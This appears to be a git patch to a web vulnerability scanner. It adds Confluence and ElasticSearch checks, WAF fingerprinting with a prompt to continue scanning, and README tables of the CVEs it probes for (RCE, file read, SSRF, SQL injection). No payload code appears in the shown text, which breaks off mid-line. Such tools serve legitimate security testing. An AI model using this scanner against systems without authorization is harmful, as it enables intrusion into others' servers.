From ba309df74b5ac935b0bea2115ececfb20dd489c4 Mon Sep 17 00:00:00 2001 From: CLincat <3132002932@qq.com> Date: Thu, 16 Jun 2022 14:34:46 +0800 Subject: [PATCH] 20220616-v1.0.9 --- README.md | 155 +++++++------ README_en-us.md | 156 +++++++------ lib/core/coreScan.py | 62 ++++- lib/initial/config.py | 2 +- lib/initial/language.py | 38 +++- lib/initial/list.py | 163 +++++++++----- lib/initial/parse.py | 8 +- lib/tool/check.py | 2 +- lib/tool/fingerprint.py | 182 ++++++++++++++- lib/tool/head.py | 16 ++ lib/tool/logger.py | 1 + payloads/AtlassianConfluence.py | 386 ++++++++++++++++++++++++++++++++ payloads/Django.py | 3 +- payloads/ElasticSearch.py | 369 ++++++++++++++++++++++++++++++ payloads/F5BIGIP.py | 13 +- payloads/Fastjson.py | 2 +- payloads/Spring.py | 12 +- payloads/ThinkPHP.py | 91 +++++++- payloads/demo2.py | 134 +++++++++++ 19 files changed, 1572 insertions(+), 223 deletions(-) create mode 100644 lib/tool/head.py create mode 100644 payloads/AtlassianConfluence.py create mode 100644 payloads/ElasticSearch.py create mode 100644 payloads/demo2.py diff --git a/README.md b/README.md index 2b7948f..6413e71 100644 --- a/README.md +++ b/README.md @@ -6,76 +6,87 @@ * 如果有什么想法、建议或者遇到了BUG, 都可以issues **目前支持扫描的web应用程序有:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
目前支持扫描的web漏洞有: [点击展开] ``` -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Target | Vul_id | Type | Method | Description | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaDruid | None | unAuth | GET | 阿里巴巴Druid未授权访问 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheStruts2 | S2-001 | RCE | POST | Struts2远程代码执行 | -| ApacheStruts2 | S2-005 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-007 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-008 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-009 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-012 | RCE | GET | Struts2远程代码执行 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 | -| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 | -| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 | -| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 | -| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 | -| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 反序列化 | -| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 反序列化 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 | -| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 | -| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 | -| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 | -| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE | -| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 | -| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 | -| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 | -| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 | -| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async反序列化 | -| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder反序列化 | -| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 | -| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Target | Vul_id | Type | Method | Description | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 | +| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 | +| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 | +| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 | +| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 | +| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 | +| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 | +| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 | +| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 | +| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 | +| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 | +| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 | +| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 反序列化 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 | +| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 | +| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 | +| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 | +| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 | +| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE | +| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 | +| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 | +| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 | +| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 | +| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 | +| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ ```
@@ -133,7 +144,7 @@ Options: http/https代理 (如: --http-proxy 127.0.0.1:8080) --user-agent=UA 自定义User-Agent --cookie=COOKIE 添加cookie - --log=LOG 日志等级, 可选1-5 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: + --log=LOG 日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容] @@ -160,15 +171,21 @@ Options: 以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.json) + General: + 通用工作参数 + + --no-waf 禁用waf检测 + --batch yes/no的选项不需要用户输入, 使用默认选项 + Lists: 漏洞列表 --list 查看所有Payload 支持的目标类型(-a参数, 不区分大小写): - AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key - cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo - u + AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f + 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut + s2,ueditor,weblogic,yonyou ``` ## language diff --git a/README_en-us.md b/README_en-us.md index 8889c56..52c2edc 100644 --- a/README_en-us.md +++ b/README_en-us.md @@ -5,76 +5,87 @@ * If you have any ideas, suggestions, or bugs, you can issue **Web applications that currently support scanning:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
The current web vulnerabilities that support scanning: [Click on] ``` -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Target | Vul_id | Type | Method | Description | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaDruid | None | unAuth | GET | Alibaba Druid unAuthorized | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheStruts2 | S2-001 | RCE | POST | Struts2 Remote code execution | -| ApacheStruts2 | S2-005 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-007 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-008 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-009 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-012 | RCE | GET | Struts2 Remote code execution | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS | -| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject | -| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect | -| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject | -| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution | -| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 deSerialization | -| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 deSerialization | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution | -| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal | -| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal | -| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution | -| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution | -| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution | -| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution | -| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Ueditor | None | SSRF | GET | Ueditor SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution | -| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass | -| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async deSerialization | -| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder deSerialization | -| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution | -| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal | -+---------------+------------------+------------+----------+------------------------------------------------------------+ ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Target | Vul_id | Type | Method | Description | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution | +| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE | +| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection | +| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS | +| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect | +| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject | +| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject | +| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution | +| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE | +| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal | +| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution | +| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization | +| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal | +| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal | +| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution | +| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution | +| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution | +| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution | +| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution | +| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution | +| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Ueditor | None | SSRF | GET | Ueditor SSRF | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization | +| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass | +| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution | +| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ ```
@@ -133,7 +144,7 @@ Options: 127.0.0.1:8080) --user-agent=UA Customize the User-Agent --cookie=COOKIE Add a cookie - --log=LOG The log level, Optional 1-5 (default: 1) [level 2: + --log=LOG The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request target +POST data] [level 4: Level 2 content + request @@ -167,15 +178,22 @@ Options: will not generate files(e.g. --output-text result.json) + General: + General operating parameter + + --no-waf Disable WAF detection + --batch The yes/no option does not require user input. The + default option is used + Lists: Vulnerability list --list View all payload Supported target types(Case insensitive): - AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key - cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo - u + AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f + 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut + s2,ueditor,weblogic,yonyou ``` ## language diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py index 76909d0..be4f048 100644 --- a/lib/core/coreScan.py +++ b/lib/core/coreScan.py @@ -7,6 +7,7 @@ from lib.tool.logger import logger from lib.tool import check from lib.report import output +from lib.tool.fingerprint import identify from payloads.AlibabaDruid import alidruid from payloads.AlibabaNacos import nacos from payloads.ApacheAirflow import airflow @@ -16,8 +17,10 @@ from payloads.ApacheTomcat import tomcat from payloads.ApacheStruts2 import struts2 from payloads.AppWeb import appweb +from payloads.AtlassianConfluence import confluence from payloads.Cisco import cisco from payloads.Django import django +from payloads.ElasticSearch import elasticsearch from payloads.F5BIGIP import f5bigip from payloads.Fastjson import fastjson from payloads.ThinkPHP import thinkphp @@ -38,6 +41,9 @@ def __init__(self): self.delay = config.get('delay') # * 延时 self.url_list = config.get('url_list') # * url列表 self.app_list = config.get('app_list') # * 框架列表 + self.batch = config.get('batch') + self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别 + # self.web_app = config.get('web_app') # * 是否启用框架指纹识别 self.thread_list = [] # * 已经运行的线程列表 self.results = [] # * 结果列表 self.queue = Queue() # * 创建线程池 @@ -48,8 +54,37 @@ def __init__(self): def start(self): ''' 开始扫描, 添加poc并启动 ''' - for u in self.url_list: # * 遍历urls - logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url + for u in self.url_list: # * 遍历urls + logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url + + # * --------------------WAF指纹识别-------------------- + if (not self.no_waf): + waf_info = identify.waf_identify(u) # * WAF指纹识别 + if waf_info: + while True: + if (not self.batch): # * 是否使用默认选项 + logger.info('red', '', print_end='') + operation = input(self.lang['core']['start']['waf_find'].format(waf_info)) # * 接收参数 + else: + logger.info('red', self.lang['core']['start']['waf_find'].format(waf_info), print_end='') + operation = 'no' # * 默认选项No + logger.info('red', 'no', notime=True) + + operation = operation.lower() # * 字母转小写 + if operation in ['y', 'yes']: # * 继续扫描 + logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描 + break + elif operation in ['n', 'no']: + logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个 + u = 'next' + break + else: + logger.info('yellow_ex', self.lang['core']['start']['waf_not_find']) + + if u == 'next': + continue + # * --------------------WAF指纹识别-------------------- + if check.check_connect(u): self.addPOC(u) # * 为url添加poc 并加入线程池 self.scanning() # * 开始扫描该url @@ -75,6 +110,7 @@ def addPOC(self, url): logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色 _exit(0) + def scanning(self): ''' 正在扫描, 根据线程数启动poc ''' queue_thread = int(self.queue.qsize() / self.thread)+1 # * 循环次数 @@ -93,24 +129,36 @@ def scanning(self): except KeyboardInterrupt: if self.stop(): continue + else: + self.queue.queue.clear() # * 清空当前url的扫描队列 + break # * 停止当前url的扫描, 并扫描下一个url + + def stop(self): ''' # ! 功能还没写好 Ctrl+C暂停扫描 q(uit) 退出扫描 c(ontinue) 继续扫描 + n(ext) 跳过当前url的扫描 m(odify) (还没写好)修改参数, 输入参数名和值(如-t 3)然后回车, 修改相应参数, 并继续扫描 wq(save and exit) 等待已经运行的poc, 保存并输出已有的漏洞结果, 有--output参数的话则同步保存至文件 ''' while True: - logger.info('reset', '[CTRL+C] q(uit)/c(ontinue)/wq(save and exit): ') # ? 提示信息 - operation = input('\r'.ljust(70)) # * 接收参数 - if operation == 'q': # * 退出 + logger.info('reset', '', print_end='') # ? 提示信息 + operation = input('\r[CTRL+C] - q(uit)/c(ontinue)/n(ext)/wq(save and exit): '.ljust(70))# * 接收参数 + operation = operation.lower() # * 字母转小写 + + if operation in ['q', 'quit']: # * 退出扫描 _exit(0) - elif operation == 'c': # * 继续扫描 + elif operation in ['c', 'continue']: # * 继续扫描 logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描 return True - elif operation == 'wq': # * 保存退出 + elif operation in ['wq', 'save and exit']: # * 保存结果并退出 self.end() + elif operation in ['n', 'next']: + logger.info('yellow_ex', 